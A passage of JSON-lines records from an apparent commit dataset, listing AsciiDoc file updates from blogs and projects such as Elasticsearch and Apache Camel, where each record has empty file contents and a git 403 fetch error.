icsearch,petabytedata\/elasticsearch,janmejay\/elasticsearch,sjohnr\/elasticsearch,franklanganke\/elasticsearch,jango2015\/elasticsearch,mbrukman\/elasticsearch,pablocastro\/elasticsearch,slavau\/elasticsearch,abhijitiitr\/es,LewayneNaidoo\/elasticsearch,loconsolutions\/elasticsearch,gfyoung\/elasticsearch,dataduke\/elasticsearch,alexbrasetvik\/elasticsearch,beiske\/elasticsearch,fooljohnny\/elasticsearch,lchennup\/elasticsearch,springning\/elasticsearch,dpursehouse\/elasticsearch,18098924759\/elasticsearch,xuzha\/elasticsearch,JackyMai\/elasticsearch,jimczi\/elasticsearch,wimvds\/elasticsearch,JervyShi\/elasticsearch,Uiho\/elasticsearch,wittyameta\/elasticsearch,javachengwc\/elasticsearch,fubuki\/elasticsearch,yuy168\/elasticsearch,strapdata\/elassandra-test,sposam\/elasticsearch,wangtuo\/elasticsearch,pozhidaevak\/elasticsearch,brandonkearby\/elasticsearch,nomoa\/elasticsearch,loconsolutions\/elasticsearch,fekaputra\/elasticsearch,mohit\/elasticsearch,kingaj\/elasticsearch,mohsinh\/elasticsearch,mkis-\/elasticsearch,weipinghe\/elasticsearch,sscarduzio\/elasticsearch,NBSW\/elasticsearch,fekaputra\/elasticsearch,thecocce\/elasticsearch,martinstuga\/elasticsearch,EasonYi\/elasticsearch,salyh\/elasticsearch,ulkas\/elasticsearch,spiegela\/elasticsearch,NBSW\/elasticsearch,markwalkom\/elasticsearch,ricardocerq\/elasticsearch,slavau\/elasticsearch,queirozfcom\/elasticsearch,wimvds\/elasticsearch,dongjoon-hyun\/elasticsearch,marcuswr\/elasticsearch-dateline,javachengwc\/elasticsearch,kubum\/elasticsearch,jprante\/elasticsearch,Brijeshrpatel9\/elasticsearch,acchen97\/elasticsearch,umeshdangat\/elasticsearch,hydro2k\/elasticsearch,LewayneNaidoo\/elasticsearch,btiernay\/elasticsearch,andrestc\/elasticsearch,nazarewk\/elasticsearch,SergVro\/elasticsearch,dataduke\/elasticsearch,winstonewert\/elasticsearch,ESam
ir\/elasticsearch,Clairebi\/ElasticsearchClone,jaynblue\/elasticsearch,Fsero\/elasticsearch,jimhooker2002\/elasticsearch,mnylen\/elasticsearch,Stacey-Gammon\/elasticsearch,wuranbo\/elasticsearch,mm0\/elasticsearch,kevinkluge\/elasticsearch,sreeramjayan\/elasticsearch,yynil\/elasticsearch,ImpressTV\/elasticsearch,YosuaMichael\/elasticsearch,acchen97\/elasticsearch,kenshin233\/elasticsearch,mrorii\/elasticsearch,achow\/elasticsearch","old_file":"rest-api-spec\/test\/README.asciidoc","new_file":"rest-api-spec\/test\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"722130c044032b6c500cfd6e5f5fc6d683c223cf","subject":"Update 2015-04-18-Update-Whats-New-in-Version-030.adoc","message":"Update 2015-04-18-Update-Whats-New-in-Version-030.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io,HubPress\/blog.hubpress.io","old_file":"_posts\/2015-04-18-Update-Whats-New-in-Version-030.adoc","new_file":"_posts\/2015-04-18-Update-Whats-New-in-Version-030.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/HubPress\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6f49b7cfdb35c155a42d3cdf2612b30e788e5f5c","subject":"y2b create post Fixing The Terrible MacBook Pro...","message":"y2b create post Fixing The Terrible MacBook Pro...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-01-22-Fixing-The-Terrible-MacBook-Pro.adoc","new_file":"_posts\/2017-01-22-Fixing-The-Terrible-MacBook-Pro.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10d099b3230733106413ed11845a1d6994edb3cb","subject":"y2b create post Is This The Future Of Keyboards?","message":"y2b create post Is This The Future Of Keyboards?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-09-03-Is-This-The-Future-Of-Keyboards.adoc","new_file":"_posts\/2017-09-03-Is-This-The-Future-Of-Keyboards.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b8783ce63970879c37e2dae1eec40038f40fa86","subject":"y2b create post Unboxing The Samsung Galaxy S9 Clone","message":"y2b create post Unboxing The Samsung Galaxy S9 Clone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-01-UnboxingTheSamsungGalaxyS9Clone.adoc","new_file":"_posts\/2018-02-01-UnboxingTheSamsungGalaxyS9Clone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned 
error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b628815dbeea3e2e7bdbd7ffabe500678d2edbd5","subject":"[DOCS] Fixed link to X-Pack transport client","message":"[DOCS] Fixed link to X-Pack transport client\n\nOriginal commit: elastic\/x-pack-elasticsearch@0870334e4b8bf5d23ed26dd755073c42fcb486da\n","repos":"nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,scorpionvicky\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,gfyoung\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,gingerwizard\/elasticsearch,scorpionvicky\/elasticsearch,gingerwizard\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch,coding0011\/elasticsearch,GlenRSmith\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,gfyoung\/elasticsearch,HonzaKral\/elasticsearch,nknize\/elasticsearch,nknize\/elasticsearch,GlenRSmith\/elasticsearch,HonzaKral\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,coding0011\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,HonzaKral\/elasticsearch,uschindler\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,robin13\/elasticsearch,HonzaKral\/elasticsearch,GlenRSmith\/elasticsearch,gingerwizard\/elasticsearch,gfyoung\/elasticsearch,GlenRSmith\/elasticsearch,robin13\/elasticsearch","old_file":"docs\/en\/security\/tribe-clients-integrations\/java.asciidoc","new_file":"docs\/en\/security\/tribe-clients-integrations\/java.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scorpionvicky\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2821c984e49d0ddbe33fbac088b21fff9451df54","subject":"Publish 2016-7-19-and.adoc","message":"Publish 2016-7-19-and.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-19-and.adoc","new_file":"2016-7-19-and.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e113232f8e41f4b83e85eb3819e9bf5120645d15","subject":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","message":"Update 2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_file":"_posts\/2016-01-23-Giving-up-XQuery-but-not-on-XQuery.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"582e7e7c7614fc92b4102e98682002ab861779a5","subject":"y2b create post See-Through Buttons For Your Laptop!","message":"y2b create post See-Through Buttons For Your 
Laptop!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-25-SeeThrough-Buttons-For-Your-Laptop.adoc","new_file":"_posts\/2017-05-25-SeeThrough-Buttons-For-Your-Laptop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0b37cf589471d3e3c1e12c2c2fa4d2f887ac1aab","subject":"CAMEL-13390 - Regen docs","message":"CAMEL-13390 - Regen docs\n","repos":"christophd\/camel,cunningt\/camel,ullgren\/camel,adessaigne\/camel,pmoerenhout\/camel,nikhilvibhav\/camel,gnodet\/camel,alvinkwekel\/camel,pmoerenhout\/camel,tadayosi\/camel,adessaigne\/camel,ullgren\/camel,pax95\/camel,nicolaferraro\/camel,mcollovati\/camel,nicolaferraro\/camel,tdiesler\/camel,tdiesler\/camel,christophd\/camel,gnodet\/camel,CodeSmell\/camel,ullgren\/camel,adessaigne\/camel,apache\/camel,tadayosi\/camel,objectiser\/camel,DariusX\/camel,cunningt\/camel,gnodet\/camel,alvinkwekel\/camel,apache\/camel,zregvart\/camel,tadayosi\/camel,objectiser\/camel,davidkarlsen\/camel,tdiesler\/camel,pmoerenhout\/camel,alvinkwekel\/camel,christophd\/camel,christophd\/camel,nikhilvibhav\/camel,apache\/camel,pmoerenhout\/camel,cunningt\/camel,gnodet\/camel,pax95\/camel,ullgren\/camel,nikhilvibhav\/camel,apache\/camel,objectiser\/camel,zregvart\/camel,pmoerenhout\/camel,davidkarlsen\/camel,cunningt\/camel,CodeSmell\/camel,DariusX\/camel,apache\/camel,tadayosi\/camel,tdiesler\/camel,pmoerenhout\/camel,Fabryprog\/camel,tdiesler\/camel,adessaigne\/camel,cunningt\/camel,tadayosi\/camel,pax95\/camel,adessaigne\/camel,gnodet\/camel,tadayosi\/camel,Fabryprog\/camel,CodeSmell\/camel,apache\/camel,christophd\/camel,Fabryprog\/camel,nicolaferraro\/camel,objectiser\/camel,mcollovati\/camel,Fabryprog\/camel,mcollovati\/camel,mcollovati\/camel,pax95\/camel,alvinkwekel\/camel,zregvart\/camel,nicolaferraro\/camel,DariusX\/camel,davidkarlsen\/camel,pax95\/camel,nikhilvibhav\/camel,davidkarlsen\/camel,tdiesler\/camel,pax95\/camel,christophd\/camel,cunningt\/camel,DariusX\/camel,zregvart\/camel,adessaigne\/camel,CodeSmell\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/jira-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/jira-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9e4be48978f73e32a583840047cbde4e39fc042","subject":"Update 2015-03-11-Metaphoric-using-HubPress.adoc","message":"Update 2015-03-11-Metaphoric-using-HubPress.adoc","repos":"ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io,ElteHupkes\/eltehupkes.github.io","old_file":"_posts\/2015-03-11-Metaphoric-using-HubPress.adoc","new_file":"_posts\/2015-03-11-Metaphoric-using-HubPress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ElteHupkes\/eltehupkes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6901a179352887243202e8ad9656cb19344328a","subject":"Update 2016-07-22-Stable-Matching-Algorithm.adoc","message":"Update 
2016-07-22-Stable-Matching-Algorithm.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddde797c8d05692bfa439eda842bcd5d52ceb147","subject":"Update 2016-12-04-Docker-starter-kit-part-2.adoc","message":"Update 2016-12-04-Docker-starter-kit-part-2.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2016-12-04-Docker-starter-kit-part-2.adoc","new_file":"_posts\/2016-12-04-Docker-starter-kit-part-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1bb0e488352a85df4ab53682e3eb30de5620f9b9","subject":"Update 2017-02-08-Native-query-in-Hibernate.adoc","message":"Update 2017-02-08-Native-query-in-Hibernate.adoc","repos":"celsogg\/blog,celsogg\/blog,celsogg\/blog,celsogg\/blog","old_file":"_posts\/2017-02-08-Native-query-in-Hibernate.adoc","new_file":"_posts\/2017-02-08-Native-query-in-Hibernate.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/celsogg\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9a064845a64cbe9921b58609108acc15a0b01b4","subject":"Update 2017-01-13-memo-like-asciidoc.adoc","message":"Update 2017-01-13-memo-like-asciidoc.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_file":"_posts\/2017-01-13-memo-like-asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9dd99f757d30bb616f478de0cab8f15f5b0cd28","subject":"Renamed '_posts\/2017-09-14-How-to-type-fast-like-a-pro.adoc' to '_posts\/2017-09-14-How-to-type-really-fast.adoc'","message":"Renamed '_posts\/2017-09-14-How-to-type-fast-like-a-pro.adoc' to '_posts\/2017-09-14-How-to-type-really-fast.adoc'","repos":"sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io,sidmusa\/sidmusa.github.io","old_file":"_posts\/2017-09-14-How-to-type-really-fast.adoc","new_file":"_posts\/2017-09-14-How-to-type-really-fast.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sidmusa\/sidmusa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"604709dd68e260bc72137ee8b4f617374bb0734e","subject":"Update 2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","message":"Update 
2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_file":"_posts\/2015-10-11-Restoring-an-old-MS-DOS-game-for-the-future.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"676be82dd59c171bf45eec228f17c941ea7f4a24","subject":"Update 2018-10-31-H-T-M-L.adoc","message":"Update 2018-10-31-H-T-M-L.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_file":"_posts\/2018-10-31-H-T-M-L.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7bab6878209f58ad58bb966910b8b6db2e764c33","subject":"Update 2018-11-11-Vuejs-3.adoc","message":"Update 2018-11-11-Vuejs-3.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_file":"_posts\/2018-11-11-Vuejs-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f83af6b6741a778bab270ace17fbff78490983e4","subject":"First draft of core concept ascii doc","message":"First draft of core concept ascii doc\n","repos":"paulcwarren\/spring-content,paulcwarren\/spring-content,paulcwarren\/spring-content","old_file":"spring-content-commons\/src\/main\/asciidoc\/content-repositories.adoc","new_file":"spring-content-commons\/src\/main\/asciidoc\/content-repositories.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/paulcwarren\/spring-content.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"c98f616c2f63c8520bd5b31f5b33d35c97f33342","subject":"Update 2015-11-27-JSF-Custom-Components-Development.adoc","message":"Update 2015-11-27-JSF-Custom-Components-Development.adoc","repos":"hfluz\/hfluz.github.io,hfluz\/hfluz.github.io,hfluz\/hfluz.github.io","old_file":"_posts\/2015-11-27-JSF-Custom-Components-Development.adoc","new_file":"_posts\/2015-11-27-JSF-Custom-Components-Development.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hfluz\/hfluz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"11880532cac74f95c6ab86c70e1ed471636bd09a","subject":"Update 2016-11-10-Lo-que-puse-hoy-en-Twitter-101116.adoc","message":"Update 2016-11-10-Lo-que-puse-hoy-en-Twitter-101116.adoc","repos":"Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io,Port666\/hubpress.io","old_file":"_posts\/2016-11-10-Lo-que-puse-hoy-en-Twitter-101116.adoc","new_file":"_posts\/2016-11-10-Lo-que-puse-hoy-en-Twitter-101116.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/Port666\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"43ac2968a0256b7e8d92c17e0b8a5ffe9bf3b3cd","subject":"write(promise-done): `Promise.prototype.done` \u3068\u306f\u4f55\u304b\u306e\u5e8f\u6587\u3092\u8ffd\u52a0","message":"write(promise-done): `Promise.prototype.done` \u3068\u306f\u4f55\u304b\u306e\u5e8f\u6587\u3092\u8ffd\u52a0\n","repos":"purepennons\/promises-book,xifeiwu\/promises-book,charlenopires\/promises-book,azu\/promises-book,liyunsheng\/promises-book,dieface\/promises-book,genie88\/promises-book,liubin\/promises-book,cqricky\/promises-book,oToUC\/promises-book,wangwei1237\/promises-book,liubin\/promises-book,wenber\/promises-book,mzbac\/promises-book,dieface\/promises-book,sunfurong\/promise,azu\/promises-book,charlenopires\/promises-book,azu\/promises-book,tangjinzhou\/promises-book,azu\/promises-book,lidasong2014\/promises-book,lidasong2014\/promises-book,mzbac\/promises-book,sunfurong\/promise,wenber\/promises-book,cqricky\/promises-book,lidasong2014\/promises-book,liubin\/promises-book,liyunsheng\/promises-book,genie88\/promises-book,wangwei1237\/promises-book,purepennons\/promises-book,wangwei1237\/promises-book,tangjinzhou\/promises-book,wenber\/promises-book,purepennons\/promises-book,xifeiwu\/promises-book,xifeiwu\/promises-book,oToUC\/promises-book,genie88\/promises-book,liyunsheng\/promises-book,sunfurong\/promise,oToUC\/promises-book,cqricky\/promises-book,mzbac\/promises-book,tangjinzhou\/promises-book,charlenopires\/promises-book,dieface\/promises-book","old_file":"Ch4_AdvancedPromises\/promise-done.adoc","new_file":"Ch4_AdvancedPromises\/promise-done.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xifeiwu\/promises-book.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"432cf837ebabdfdca892743c1b79251e20e8c5d1","subject":"y2b create post 1TB storage for your iPad? -- Corsair Voyager Air Unboxing \\u0026 Overview","message":"y2b create post 1TB storage for your iPad? 
-- Corsair Voyager Air Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-04-20-1TB-storage-for-your-iPad--Corsair-Voyager-Air-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2013-04-20-1TB-storage-for-your-iPad--Corsair-Voyager-Air-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ce9ff717f76474d4ea34273e03b23916324e38cd","subject":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","message":"Publish 2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_file":"2016-6-27-PHPER-PH-Pnsetarray-splice-AND-array-filter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"765f3130fa05979f5837c903ace3943160c1e9d9","subject":"y2b create post SWITCHING TO BLACKBERRY","message":"y2b create post SWITCHING TO BLACKBERRY","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-18-SWITCHING-TO-BLACKBERRY.adoc","new_file":"_posts\/2016-02-18-SWITCHING-TO-BLACKBERRY.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"95dd8d38c60bdda87876147736633a3c5e8343a1","subject":"Update 2016-04-02-Repos-converting-Hg-Git.adoc","message":"Update 2016-04-02-Repos-converting-Hg-Git.adoc","repos":"pwlprg\/pwlprg.github.io,pwlprg\/pwlprg.github.io,pwlprg\/pwlprg.github.io,pwlprg\/pwlprg.github.io","old_file":"_posts\/2016-04-02-Repos-converting-Hg-Git.adoc","new_file":"_posts\/2016-04-02-Repos-converting-Hg-Git.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pwlprg\/pwlprg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4fd4ec2b4fba234c00f464ab16a68333371ed9f0","subject":"y2b create post Nvidia Shield Unboxing, First Look \\u0026 Test!","message":"y2b create post Nvidia Shield Unboxing, First Look \\u0026 Test!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2013-07-30-Nvidia-Shield-Unboxing-First-Look-u0026-Test.adoc","new_file":"_posts\/2013-07-30-Nvidia-Shield-Unboxing-First-Look-u0026-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9af5a3cb157f7e41a1130e103d2fb29243bd70c7","subject":"y2b create post Would You Wear This Thing In Public?","message":"y2b create post Would You Wear This Thing In 
Public?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-10-10-Would-You-Wear-This-Thing-In-Public.adoc","new_file":"_posts\/2017-10-10-Would-You-Wear-This-Thing-In-Public.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9cf1efba042375a58b48b1c4bfa86d29869b16c2","subject":"Page completed","message":"Page completed\n","repos":"kidaa\/incubator-groovy,alien11689\/incubator-groovy,sagarsane\/groovy-core,adjohnson916\/groovy-core,russel\/incubator-groovy,alien11689\/groovy-core,russel\/incubator-groovy,christoph-frick\/groovy-core,russel\/incubator-groovy,dpolivaev\/groovy,shils\/incubator-groovy,apache\/incubator-groovy,traneHead\/groovy-core,jwagenleitner\/groovy,nkhuyu\/incubator-groovy,yukangguo\/incubator-groovy,ebourg\/incubator-groovy,russel\/groovy,bsideup\/incubator-groovy,groovy\/groovy-core,paulk-asert\/incubator-groovy,PascalSchumacher\/incubator-groovy,paulk-asert\/incubator-groovy,alien11689\/incubator-groovy,alien11689\/groovy-core,shils\/groovy,alien11689\/groovy-core,adjohnson916\/incubator-groovy,rlovtangen\/groovy-core,adjohnson916\/groovy-core,pledbrook\/incubator-groovy,armsargis\/groovy,EPadronU\/incubator-groovy,guangying945\/incubator-groovy,alien11689\/incubator-groovy,PascalSchumacher\/incubator-groovy,mariogarcia\/groovy-core,bsideup\/incubator-groovy,graemerocher\/incubator-groovy,apache\/incubator-groovy,taoguan\/incubator-groovy,mariogarcia\/groovy-core,ebourg\/incubator-groovy,adjohnson916\/groovy-core,shils\/incubator-groovy,sagarsane\/incubator-groovy,tkruse\/incubator-groovy,pledbrook\/incubator-groovy,ebourg\/groovy-core,pickypg\/incubator-groovy,shils\/incubator-groovy,traneHead\/groovy-core,antoaravinth\/incubator-groovy,alien11689\/groovy-core,armsargis\/groovy,ChanJLee\/incubator-groovy,traneHead\/groovy-core,armsargis\/groovy,jwagenleitner\/incubator-groovy,apache\/incubator-groovy,jwagenleitner\/groovy,paulk-asert\/incubator-groovy,shils\/groovy,eginez\/incubator-groovy,sagarsane\/groovy-core,bsideup\/incubator-groovy,EPadronU\/incubator-groovy,gillius\/incubator-groovy,mariogarcia\/groovy-core,kidaa\/incubator-groovy,aim-for-better\/incubator-groovy,jwagenleitner\/incubator-groovy,fpavageau\/groovy,pickypg\/incubator-groovy,dpolivaev\/groovy,ChanJLee\/incubator-groovy,avafanasiev\/groovy,guangying945\/incubator-groovy,traneHead\/groovy-core,genqiang\/incubator-groovy,nobeans\/incubator-groovy,bsideup\/incubator-groovy,aim-for-better\/incubator-groovy,aaronzirbes\/incubator-groovy,ChanJLee\/incubator-groovy,rlovtangen\/groovy-core,nobeans\/incubator-groovy,christoph-frick\/groovy-core,jwagenleitner\/incubator-groovy,pickypg\/incubator-groovy,paplorinc\/incubator-groovy,russel\/groovy,adjohnson916\/groovy-core,taoguan\/incubator-groovy,i55ac\/incubator-groovy,guangying945\/incubator-groovy,samanalysis\/incubator-groovy,tkruse\/incubator-groovy,rlovtangen\/groovy-core,paulk-asert\/groovy,pickypg\/incubator-groovy,gillius\/incubator-groovy,alien11689\/groovy-core,ebourg\/incubator-groovy,nkhuyu\/incubator-groovy,fpavageau\/groovy,yukangguo\/incubator-groovy,adjohnson916\/incubator-groovy,paplorinc\/incubator-groovy,pledbrook\/incubator-groovy,paplorinc\/incubator-groovy,avafanasiev\/groovy,PascalSchumacher\/incubator-groovy,kenzanmedia\/incubator-gr
